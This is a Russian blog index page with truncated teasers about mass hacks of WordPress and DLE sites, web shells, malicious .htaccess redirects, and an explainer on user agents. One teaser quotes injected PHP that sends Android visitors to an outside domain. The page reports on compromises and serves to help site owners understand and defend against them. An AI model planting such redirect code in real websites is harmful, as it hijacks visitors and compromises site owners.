Всем привет! Как и обещал, сегодня логическое  продолжение истории про взлом  сайта на движке Вордпресс. В тот раз неизвестный хакер или хакеры взломали сайт под управлением CMS WordPress,  и залили на него шелл, благодаря чему был получен доступ ко всем остальным сайтам на сервере, и в файлах дополнительной конфигурации .htaccess была прописана переадресация на посторонние […]

Начало. Уязвимость в сайтах на движке Как видим, добавился не только новый домен http://yacounter.ws (ну любит злоумышленник зону ws, что тут поделать:)), но и eval. Но и за первую версию также есть случаи, которые говорят следующее. В файлах движка цмс  dle появляется совсем другой код, например, такой: if(stripos($_SERVER[‘HTTP_USER_AGENT’],»Android»)!==false) {header(‘Location: http://refresh-browser.00xff.net/’);exit;} Как видим, домен здесь совсем […]

Как ломали сайты на  популярном новостном движке ДЛЕ, хронология событий. Совсем недавно я писал о том, что в начале месяца  было взломано огромное количество сайтов на dle, в результате чего на сайтах ничего не подозревающих владельцев,  естественно без их ведома,  прописывался вредоносный код. Сегодня поговорим более подробно про уязвимости в сайтах на движке dle, как […]

Что такое  юзер-агент и для чего его нужно менять? User Agent (юзер-агент) — клиентское  приложение, работающее по определенным правилам (протоколам). В роли таких приложений могут выступать  различные  браузеры, мобильные устройства (смартфоны), роботы поисковых систем.  При посещении какого-либо веб-узла, сео-блога в интернете приложение посылает информацию о себе  виде   HTTP-запроса, который начинается словами: User-Agent (User-agent). Эта информация […]

Прошлый раз я писал о том, как Жерар Депардье стал жителем Подмосковья  и о конкурсе сеокафестатейность, а в этот раз  давайте поговорим  о  компьютерной безопасности. Первая и самая главная новость  за сегодня – это обнаруженная не так давно уязвимость в популярном пользовательском движке Data Life Engine (DLE).   В чём заключается данная уязвимость?  Как сообщается на […]